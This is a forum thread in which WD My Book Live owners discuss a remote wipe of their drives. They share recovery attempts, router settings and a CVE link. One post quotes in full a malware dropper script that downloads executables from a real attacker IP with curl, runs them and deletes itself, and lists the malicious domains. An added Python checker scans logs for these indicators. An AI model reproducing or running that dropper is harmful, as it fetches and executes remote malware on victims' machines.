Help! All data in mybook live gone and owner password unknown

Two 3TB MBLs here in the UK. All data still present and no change to the admin password, thankfully.

Although both drives did have a notification for ‘Firmware Updated Successfully’ in the dashboard, which was a bit weird.

FYI, it’s the exact same firmware version as the latest one last issued for these drives. Is it possible that the firmware has been hacked? Any thoughts, people?

I’ve now powered down both MBLs until this mess is confirmed as fixed, and will attempt a direct PC connection to back up all data later, but honestly, what a mess.


MyBookLive 2TB… all data gone overnight. Renamed itself back to MyBookLive. Removed the HDD (broke clips in my annoyance!) and currently running the DiskInternals Disk Recovery programme on the /DataVolume Linux Ext partition(??). Found some files on the Linux Ext Volume 2 but nothing I recognised as my pictures and documents. Not 100% sure how this DiskInternals works, so hope I am doing it right!! Tried to run Recuva but it could not do anything without formatting the disk first… I didn’t!!!

Update on data recovery from the repair shop…
- No success taking the drive out and trying to extract the files the basic way. The drive immediately asked to format.
- They’re now starting to use the data recovery software, so we’ll see what happens.


Just received the following from WD Support:
Dear MARK

I apologize for the inconvenience and for the issue you are experiencing.

Western Digital is actively working on resolving this issue to the best of our customer satisfaction.

Please allow us time to investigate the issue further.

Thank you for your patience and understanding.

Oef, I read about this on a news site in the afternoon, phoned home and got the network disconnected; luckily I still have all my data. I do hope for a quick fix though, otherwise it will turn the device (My Book Live Duo) into local-only storage, which would still be vulnerable if something gets on my PC, thus a useless product.

Has anyone found a solution for this issue? I still don’t get how this happened… Were we attacked or is it a firmware bug?

Learn:

  • A Disk RAID is not a backup
  • A packet filter is not a firewall
  • Do not trust any device if the firmware has never been updated or has not been updated for years.
  • Don’t establish cloud links. Never.
  • Make sure you disable UPnP. Always.
  • Protect your network and devices adequately

Note to myself: I tested WD NAS devices a decade ago and threw them away after two weeks; those WD NASes were the biggest ■■■■ I saw on the market.

Sorry to see you all with lost data. You will do it better the next time.

A link that may help you:

You may find the root cause here; it looks like someone has cleaned up the mess WD has left behind:
https://nvd.nist.gov/vuln/detail/CVE-2018-18472

I’m thankful to the person/group who ran the scan and took those devices offline. Unimaginable if someone else used those devices for brute force, DDoS or other attacks. Maybe those devices were already uncontrollable zombies and someone decided to eliminate this threat to the web or to himself as an act of self-defense; you’ll never know.

My My Book Live has been factory reset; remote access was not enabled. WD are blaming malware and claiming they have not been hacked, but I cannot see how. Even with remote access off, WD were able to push firmware updates, so this seems the most likely scenario, with IP data being harvested from WD servers.
Just ripped the disk out of the enclosure and plugged it into a SATA cradle, and the data’s gone.
Now ordered a Synology NAS enclosure with Seagate drives - goodbye WD.


I was not affected. Some data in case it’s helpful in narrowing down what is causing the problem:

Firmware version 02.42.03-027
Auto update disabled.
Remote access disabled and to my knowledge has never been enabled.
Behind NAT with no port forwarding.
UPnP disabled.

Have backups but am making another one just in case.

Update on my end: Trying out Disk Drill, appears to be working. It’s been running for about 5 minutes so far out of an estimated 16 hours and it’s already found a dozen PDFs and JPGs that were deleted. At first glance they look alright, but haven’t done a deep dive on the PDFs yet. Will hold off on purchasing the full version of the program until I can find out what all can be recovered, but it looks promising so far.

For those curious, I disassembled the MBL enclosure, removed the HDD, and plugged it into another external HD case I had. After what happened I didn’t trust trying to run data recovery over the network.


Can you let us know when you have worked out how to get into the MyBook Live? It looks as if you have to destroy the plastic case to get into it; I haven’t discovered any screws at all.

The case clips together; most of the clips broke while prising it apart. No loss, as it will not be reassembled. I will not trust it now.

Not tried it yet but found this on YouTube:

From now on, if you lost data, please let us know the following:

  1. On your router, is UPnP enabled or disabled?
  2. Before the device was reset, was Remote Access enabled or disabled?
  3. Did you have Auto Update enabled or disabled?

If any of these are enabled, particularly UPnP, disable them immediately.

Useful, but I’m hoping there is a WD fix before I have to destroy the case!

I posted this on reddit, but here it is and hopefully, WD can use this info.

(note edited to only include one link because I’m a new user)

My Netgear Armor started complaining that my WD MyBookLive was trying to reach a couple of URLs and that they were blocked. These were qlitrk dot com (with various sub domains such as supertrk dot qlitrk dot com) and 185.153.196.30/WSC0

I finally looked at what IP address /WSC0 contained and it was this:

#!/bin/sh
n="OFJU"
if [ $# -gt 0 ]; then
n=$@
fi
cd /tmp
for a in $n
do
rm $a
curl -O http://185.153.196.30/$a
chmod +x $a
./$a
done
for a in $n
do
rm -rf $a
done
rm $0

I’m thankful that Netgear blackholed that 185 address but sheesh… too close for comfort.

If it helps
UPnP enabled
Remote access disabled
Auto update don’t know
Lost data

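As an added example (not code from this thread or from WD), a small Python checker that refangs the indicators quoted in the post above (the "dot"-written domains and the 185.153.196.30 dropper host) and runs them over a constructed egress log, flagging the LAN host that resolved or fetched them. The log line format is an assumption for the example.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Indicators exactly as the poster wrote them ("dot"-defanged); refanged below.
DEFANGED = ["qlitrk dot com", "supertrk dot qlitrk dot com", "185.153.196.30/WSC0"]
# Constructed log format (not the poster's): timestamp, source IP, DNS|HTTP, target.
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) (?P<kind>DNS|HTTP) (?P<target>\S+)")

def refang(s):
    """Turn 'qlitrk dot com' back into 'qlitrk.com'; IPs and paths are untouched."""
    return re.sub(r"\s+dot\s+", ".", s.strip(), flags=re.IGNORECASE)

def split_indicators(items):
    # Sort refanged indicators into a domain set and an IP set; URL paths are dropped.
    domains, ips = set(), set()
    for item in items:
        host = urlsplit("//" + refang(item)).hostname or ""
        try:
            ip_address(host)
            ips.add(host)
        except ValueError:
            domains.add(host.lower())
    return domains, ips

def host_matches(host, domains, ips):
    """Exact IP, or exact/subdomain match: cdn.qlitrk.com hits, notqlitrk.com does not."""
    host = host.lower().rstrip(".")
    return host in ips or any(host == d or host.endswith("." + d) for d in domains)

def find_hits(log_lines, indicators=DEFANGED):
    # Return (ts, src, kind, target) for every line whose host matches an indicator.
    domains, ips = split_indicators(indicators)
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m["target"]
        host = urlsplit(target).hostname if "://" in target else target
        if host and host_matches(host, domains, ips):
            hits.append((m["ts"], m["src"], m["kind"], target))
    return hits

# Constructed sample lines: a NAS at 192.168.1.50 resolving and fetching the dropper.
SAMPLE_LOG = [
    "2021-06-24T02:13:07Z 192.168.1.50 DNS supertrk.qlitrk.com",
    "2021-06-24T02:13:08Z 192.168.1.50 HTTP http://185.153.196.30/WSC0",
    "2021-06-24T02:13:09Z 192.168.1.50 DNS time.nist.gov",
    "2021-06-24T02:14:00Z 192.168.1.50 HTTP http://notqlitrk.com/index.html",
    "2021-06-24T02:14:30Z 192.168.1.51 DNS cdn.qlitrk.com.",
]
```

Feeding real router or DNS-filter export lines through the same regex (adjusted to their layout) gives the list of internal hosts that contacted the dropper infrastructure, which is what the Netgear Armor alert in the post was reporting.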

My 3TB MBLs are both powered down now, with no data loss and the account still accessible.

But as I said in a previous post, I had a ‘Firmware Successfully Installed’ message in both Dashboards when I logged in.

As I’m a BT customer I’m using a Smart Hub 2, which does have UPnP on for the WD devices on my network.

I do have to ask: shouldn’t turning off Remote Access and unchecking “check for updates” in the Dashboard physically disconnect MBLs from all internet traffic?

I’ve also disabled access to the internet for those devices on the Smart Hub, so when/if I do turn them on again, they’re not accessible. At least, that’s the theory…

The REST API was accessible to the public, maybe because of UPnP - what a beautiful world, it just works and nobody needs any knowledge.

  1. UPnP is enabled on my router
  2. Remote access was enabled prior to this threat, it is off now
  3. Auto Update was disabled
  4. did not lose data
  5. FTP service was disabled
  6. my device’s network name was not a common name
  7. the last firmware updated was received in 2016
